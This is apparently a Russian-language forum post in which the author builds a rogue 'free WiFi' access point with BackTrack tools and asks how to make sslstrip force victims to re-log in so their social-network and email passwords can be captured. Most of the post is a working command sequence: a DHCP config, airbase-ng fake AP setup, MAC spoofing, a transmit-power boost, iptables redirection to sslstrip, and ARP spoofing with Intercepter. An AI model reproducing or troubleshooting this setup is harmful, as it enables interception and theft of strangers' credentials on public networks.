Разбираюсь с backtrack 5r2 и сопутствующими утилитами. Недавно возник вопрос: как заставить sslstrip "сбрасывать" сессию жертвы, (если тот например не выходит из контакта\мыла\одноклассников на своём гаджете) при подключении к моей подставной точке "бесплатного вайфая". Для начала создавал точку через альфу. dhcp поставил, настроил: ddns-update-style ad-hoc; default-lease-time 3600; max-lease-time 7200; authoritative; log-facility local4; subnet 172.17.0.0 netmask 255.255.255.0 { option subnet-mask 255.255.255.0; option broadcast-address 172.17.0.255; option routers 172.17.0.1; option domain-name-servers 8.8.8.8; range 172.17.0.2 172.17.0.250; } идём дальше: airmon-ng start wlan0 ifconfig wlan0 down macchanger --mac=00:40:45:31:b5:34 wlan0 ifconfig mon0 down macchanger --mac=00:40:45:31:b5:34 mon0 iw reg set BO iwconfig wlan0 txpower 30 ifconfig wlan0 up iwconfig airbase-ng -e WiFi_FREE -c 3 mon0 ifconfig at0 up ifconfig at0 172.17.0.1 netmask 255.255.255.0 route add -net 172.17.0.0 netmask 255.255.255.0 gw 172.17.0.1 iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -o ppp0 -j MASQUERADE echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 cd /pentest/web/sslstrip/ && python sslstrip.py -a -k -f -w /root/sslstrip.txt & cd ~ echo > '/var/lib/dhcp3/dhcpd.leases' ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 & Cобственно всё это менялось несколько раз, пробовались разные вариации и в итоге точка таки работает, клиенты садяться, инет раздаётся. Но по сути имею один пароль из пяти - десяти (на столе стоял ноут с BT и ноут жертва для чистоты экперимента) и самое главное не смотря на ключ "-K" sslstrip НЕ выкидывает пользователя на страницу авторизации! Попробовал использовать вместо альфы роутер с dd-wrt. Всё настроено, инет раздаётся, куки ловятся wireshark, но опять же intercepter собирает ДАЛЕКО не все пароли и sslstrip не выкидывает. Попробовал просто находится в одной сетке с компом-жертвой и спуфить его пакеты на себя + sslstrip+wireshark+intercepter. И опять с авторизацией ни-че-го... и с паролями очень плохо всё. Изначально стояла sslstrip 0.9, откатил до 0.8 - тоже самое, пробовал ставить ключ "-k" в разных местах команды, пробовал запускаться не через панель программ, а непосредсвенно из папки, переустанавливал sslstrip. комп - toshiba satellite L55. Пробовал ставить с офф сайта разработчика pithon twisted web - версию рекомендованную для работы с sslstrip. sslstrip работает (хоть и выдаёт ошибку 105 в процессе но её можно игнорировать) логи пишутся, но тем не менее. Я просто в тупике. Помогите, кто сталкивался с подобной проблемой - есть вариант как то нормально заставить всё это работать (что бы заставляло авторизовываться + ловились все пароли на ресурсы)
В общем поставил intercepter. Пришел домой стал экспериментировать: сетевая карта alfa. Т.к. цептер не (с gui) не дружит с линухой - гружусь с семёрки. Втыкаюсь в свою домашнюю сеть, справа ноут 192.168.1.103 слева ноут-жертва с 192...101, на столе роутер с инетом 192....1. Снифаю альфу, нахожу всё это хозяйство, вбиваю default router, klient, в настройках ip forward, галки на ssl strip и ssl mitm и... вижу только пакеты от ноута с цептером... что делать? Хз...